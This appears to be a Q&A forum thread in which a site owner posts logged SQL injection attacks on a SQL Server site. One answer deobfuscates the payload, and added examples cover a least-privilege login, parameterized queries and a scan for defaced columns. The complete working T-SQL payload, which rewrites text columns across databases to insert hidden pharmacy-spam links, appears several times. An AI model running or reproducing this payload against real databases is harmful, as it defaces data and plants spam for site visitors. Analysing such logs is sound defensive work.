2016-04-13 82 views
2

I caught the following exception in my logs: someone is trying to hack my site

mt: 15867';declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in 
('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '[email protected]+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case 
ABS(CHECKSUM(NewId()))%10 when 0 then ''''''+char(60)+''div style="display:none"''+char(62)+''inderal 10mg ''+char(60)+''a href="http:''+char(47)+char(47)+''blog.coepd.com''+char(47)+''page''+char(47)+''Keflex-Pill"''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''blog.coepd.com'''' when 1 then ''''blog.coepd.com'''' else 
''''blog.coepd.com'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' viagra 25mg''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in 
(2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--<br/> sess: 2<

The hack begins with ';declare and ends with --. All my SQL queries should be parameterized, but in case they aren't, I need to eliminate this threat.

What is my best option? I have a specific "web" login account for the database. What is the best practice for minimizing this web login account's credentials, or denying it access to specific SQL objects?

What is this person trying to do? Here is another hack attempt:

;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into 
@w;while @@FETCH_STATUS=0 begin set @s='begin try use '[email protected]+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''''+char(60)+''div style="display:none"''+char(62)+''tadalafil 40mg ''+char(60)+''a 
href="http:''+char(47)+char(47)+''www.guitar-frets.com''+char(47)+''blog''+char(47)+''page''+char(47)+''synthroid-200mcg.aspx"''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''levofloxacin 750mg'''' when 1 then ''''guitar-frets.com'''' else ''''guitar-frets.com'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' valacyclovir 
pill''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin 
exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--<br 

Here is a snapshot of my log. If you read it from bottom to top, you can see this hacker trying every parameter in turn to inject his code.

[screenshot of the request log]

+0

It's really quite simple: make sure you parameterize your SQL queries, for exactly this reason. Create a user account that only has access to the specific database (or databases). Have the server that SQL Server is installed on deny any connection that does not come from the specified IP addresses. –

+0

Get the process. Are you on a VPN? Sometimes it happens while crawling through the server for a backup – hemanjosko

+0

The OWASP Foundation has everything you need to know: https://www.owasp.org/index.php/Category:OWASP_Guide_Project –
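The restricted "web" login that the question asks about and the first comment recommends, as an added example (not code from the question's author or the commenters). It creates a SQL Server login that can reach one database with only the rights the application uses, then checks it from that login's point of view with the same database enumeration the injected script starts with. AppDb, dbo.Orders and its Notes column, dbo.usp_GetOrderBySession, web_app and web_role are assumed names.

```sql
-- Added example, not code from the original post or comments. Creates a SQL Server
-- login for the web tier that can reach one database with only the rights the
-- application needs, then checks it from that login's point of view using the
-- same enumeration the injected script performs. AppDb, dbo.Orders (with a Notes
-- column), dbo.usp_GetOrderBySession, web_app and web_role are assumed names.

USE master;
GO
-- Server-level login for the web tier only: no server roles, no sysadmin.
CREATE LOGIN web_app
    WITH PASSWORD = 'replace-with-a-long-random-secret-1!', CHECK_POLICY = ON;
GO

USE AppDb;
GO
-- Map the login into the one database it needs. Do not add it to db_owner or
-- db_datawriter: the injected script's generated UPDATEs depend on having UPDATE
-- rights on every long text column the login can see.
CREATE USER web_app FOR LOGIN web_app;
CREATE ROLE web_role;
ALTER ROLE web_role ADD MEMBER web_app;

-- Preferred: EXECUTE on the application's stored procedures only. Procedures that
-- take parameters give an injected "update [table] set [column]=..." no table to
-- aim at.
GRANT EXECUTE ON OBJECT::dbo.usp_GetOrderBySession TO web_role;

-- Where direct table access is unavoidable, grant per table and per verb.
-- Deliberately no UPDATE here: the web tier appends rows, it never rewrites text.
GRANT SELECT ON OBJECT::dbo.Orders TO web_role;
GRANT INSERT ON OBJECT::dbo.Orders TO web_role;
GO

-- Check it as the web login would see it (needs IMPERSONATE, which sysadmin has).
EXECUTE AS LOGIN = 'web_app';

-- The injected script's first step: list databases the current login can enter.
-- master and tempdb are reachable by every login (the script excludes them for
-- that reason); the only row this should return is AppDb.
SELECT name
FROM sys.databases
WHERE has_dbaccess(name) <> 0
  AND name NOT IN ('master', 'tempdb', 'model', 'msdb');

-- The kind of statement the script generates for each long text column; with the
-- grants above it fails with a permission-denied error instead of defacing data.
BEGIN TRY
    UPDATE dbo.Orders SET Notes = Notes + N'x';
END TRY
BEGIN CATCH
    SELECT ERROR_NUMBER() AS err, ERROR_MESSAGE() AS msg;  -- UPDATE permission was denied
END CATCH;

REVERT;
```

Run the check block again after any later GRANT: if the SELECT from sys.databases ever returns more than AppDb, the login has been mapped into a database it should not reach, which is exactly what the script's outer cursor walks. Denying VIEW ANY DATABASE to the login additionally stops it listing other database names, with the caveat that it then also hides from sys.databases databases the login is merely mapped into, so do the check before adding that deny. None of this replaces parameterized queries; it limits what an injection can do, not whether one happens.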

Answers

1

Blocking IPs would be a start, and make sure all input is escaped etc. If everything is properly escaped, and by that I mean using whatever your database recommends rather than a regex you found on StackOverflow :), SQL injection is very unlikely.

Make sure that what they are doing is not an attack on a third-party library, i.e. they may not be attacking your code; they may be going after a known vulnerability in a common library you are using.

If the SQL injection doesn't work, they may try DoS/DDoS or something else next to break your site. There isn't much most sites can do to mitigate a serious DDoS attempt, but if you start blocking IPs the hacker will likely realize quickly that there is no fruit here that she is looking for, and move on.

I'm assuming access to the back-end systems is secured via VPN, i.e. a decent password policy etc.

4

As the others have said, use parameterized SQL queries.

Here is the formatted SQL:

DECLARE @b CURSOR; 
DECLARE @s VARCHAR(8000); 
DECLARE @w VARCHAR(99); 

SET @b=CURSOR 
FOR SELECT Db_name() 
    UNION 
    SELECT NAME 
    FROM sys.databases 
    WHERE (Has_dbaccess(NAME) != 0) 
      AND NAME NOT IN ('master', 'tempdb', 'model', 'msdb', Db_name()); 

OPEN @b; 

FETCH next FROM @b INTO @w; 

WHILE @@FETCH_STATUS = 0 
    BEGIN 
     SET @s='begin try use ' + @w 
      + 
';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''''+char(60)+''div style="display:none"''+char(62)+''inderal 10mg ''+char(60)+''a href="http:''+char(47)+char(47)+''blog.coepd.com''+char(47)+''page''+char(47)+''Keflex-Pill"''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''blog.coepd.com'''' when 1 then ''''blog.coepd.com'''' else ''''blog.coepd.com'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' viagra 25mg''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch' 
    ; 

    EXEC (@s); 

    FETCH next FROM @b INTO @w; 
END; 

CLOSE @b--<br/> sess: 2< 

And the inner query:

; 
DECLARE @c 
CURSOR;DECLARE @d VARCHAR(4000);SET @c= 
    CURSOR FOR 
    SELECT ''UPDATE [''+TABLE_NAME+''] 
    SET [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+ 
      CASE Abs(Checksum(Newid()))%10 
        WHEN 0 THEN ''''''+Char(60)+''div style="DISPLAY:none"''  +char(62)+''inderal 10mg ''+char(60)+''a href="HTTP:''+char(47)+char(47)+''blog.coepd.com''+char(47)+''page''+char(47)+''keflex-pill"''  +char(62)+''''''+ 
      CASE abs(checksum(newid()))%3 
      WHEN 0 THEN 
      ''''blog.coepd.com'''' 
      WHEN 1 THEN 
      ''''blog.coepd.com'''' 
      ELSE ''''blog.coepd.com'''' 
      END 
      +''''''+char(60)+char(47)+''a''+char(62)+'' viagra 25mg''+char(60)+char(47)+''div''+char(62)+'''''' 
      ELSE '''''''' 
     END 
     '' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN information_schema.columns ON o.NAME=table_name WHERE(
      indid IN (0, 
        1) 
     ) 
     AND 
     data_type LIKE ''%varchar'' 
     AND 
     ( 
      character_maximum_length IN (2147483647, 
             -1) 
     );OPEN @c;FETCH next 
     FROM @c 
     INTO @d;WHILE @@FETCH_STATUS=0 
     BEGIN 
      EXEC (@d); 
      FETCH next 
      FROM @c 
      INTO @d; 

     END;CLOSE @c 
     END TRY BEGIN CATCH 
     END CATCH 

They are basically trying to update all the text columns in all databases and tables.

So this is just a spam script trying to advertise some magic pills.
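Two things this answer leaves to the reader, as an added example (not code from the answerer or the original page): part 1 places the string-concatenation pattern that lets the logged payload run beside the sp_executesql form that binds the value as a parameter; part 2 uses the answer's observation that the script only rewrites (n)varchar(max)-length columns to build a scan of exactly those columns for the hidden-div marker it inserts. The #Sessions table, its rows and the column names mt/sess (the logged parameter names) are constructed for the demo; the payload value is the logged one, truncated after its first statements.

```sql
-- Added example, not code from the original question or answers. Part 1: the
-- vulnerable concatenation next to the parameterized sp_executesql form. Part 2:
-- a generated scan of every column the payload targets. #Sessions and its data
-- are constructed for the demo; the @mt value is the logged payload, truncated.

-- Constructed stand-in for the application's table (mt/sess are the logged names).
CREATE TABLE #Sessions (mt NVARCHAR(50) NOT NULL, sess INT NOT NULL);
INSERT INTO #Sessions (mt, sess) VALUES (N'15867', 2);

-- The start of the logged value of "mt". Once the quote and ';' are inside the
-- concatenated statement the rest of the batch belongs to the attacker; the
-- trailing '--' comments out whatever the application appended after the value.
DECLARE @mt NVARCHAR(4000) =
    N'15867'';declare @b cursor;declare @s varchar(8000);/* ... */close @b--';

-- VULNERABLE: value spliced into the statement text.
DECLARE @unsafe NVARCHAR(MAX) =
    N'SELECT sess FROM #Sessions WHERE mt = ''' + @mt + N'''';
PRINT @unsafe;    -- shows the attacker's statements as part of our batch
-- EXEC (@unsafe); -- would execute them with the web login's permissions

-- SAFE: the same query with @mt bound as a typed parameter. The quote, ';' and
-- '--' are data, so the predicate compares the whole string and matches nothing.
DECLARE @safe NVARCHAR(MAX) = N'SELECT sess FROM #Sessions WHERE mt = @mt';
EXEC sp_executesql @safe, N'@mt NVARCHAR(4000)', @mt = @mt;      -- 0 rows
EXEC sp_executesql @safe, N'@mt NVARCHAR(4000)', @mt = N'15867'; -- 1 row: sess = 2

DROP TABLE #Sessions;

-- Part 2: the payload's inner cursor only touches columns whose DATA_TYPE ends in
-- varchar and whose CHARACTER_MAXIMUM_LENGTH is -1 or 2147483647, in the current
-- database. Build one COUNT per such column of rows carrying the hidden-div marker
-- the payload writes, then run the combined statement.
DECLARE @scan NVARCHAR(MAX) = N'';
SELECT @scan = @scan
    + N'SELECT N''' + REPLACE(TABLE_SCHEMA + N'.' + TABLE_NAME + N'.' + COLUMN_NAME, N'''', N'''''')
    + N''' AS col, COUNT(*) AS hits FROM ' + QUOTENAME(TABLE_SCHEMA) + N'.' + QUOTENAME(TABLE_NAME)
    + N' WHERE ' + QUOTENAME(COLUMN_NAME) + N' LIKE N''%<div style="display:none"%'' UNION ALL '
FROM INFORMATION_SCHEMA.COLUMNS
WHERE DATA_TYPE LIKE '%varchar'
  AND CHARACTER_MAXIMUM_LENGTH IN (-1, 2147483647);

IF LEN(@scan) > 0
BEGIN
    SET @scan = LEFT(@scan, LEN(@scan) - LEN(N' UNION ALL ')); -- drop trailing UNION ALL
    EXEC sp_executesql @scan;  -- one row per column; hits > 0 means it was defaced
END
```

The scan is built with the same INFORMATION_SCHEMA predicate the payload uses, so it covers exactly the columns the script could have rewritten and nothing else; run it in each database the web login can reach, since the outer cursor visits every one of them. Parameterization in application code (SqlParameter in ADO.NET, placeholders in any other driver) is the same idea as sp_executesql here: the value travels separately from the statement text and is never parsed as SQL.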